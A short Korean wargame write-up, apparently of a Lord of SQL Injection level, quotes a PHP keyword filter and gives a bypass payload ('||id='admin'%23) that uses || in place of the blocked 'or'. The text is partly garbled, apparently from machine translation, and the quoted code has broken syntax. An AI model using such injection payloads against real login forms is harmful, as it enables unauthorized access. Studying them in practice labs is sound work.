문제는 다음과 같습니다. 코드를 자세히 살펴보겠습니다.
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET(pw))) exit("No Hack ~_~");
if(preg_match('/or|and/i', $_GET(pw))) exit("HeHe");첫 번째 줄은 ./config.php 파일을 포함하라고 말합니다.
두 번째 줄은 로그인 여부를 확인합니다.
'추천 관련글,
세 번째 줄은 db를 연결합니다.
if 문은 콘텐츠를 필터링합니다.
콘텐츠 필터링
| 해킹 금지 1차 샘플 2._ 삼. . 4. ( 5.) 헤헤 1. 또는 2와 |
또는 및 필터, 그러나 ||또는 &&or or and with 를 사용할 수도 있으므로 사용해 봅시다.
'||id='admin'%23위의 내용을 pw에 입력합니다.
아주 쉽게 벗겨졌습니다.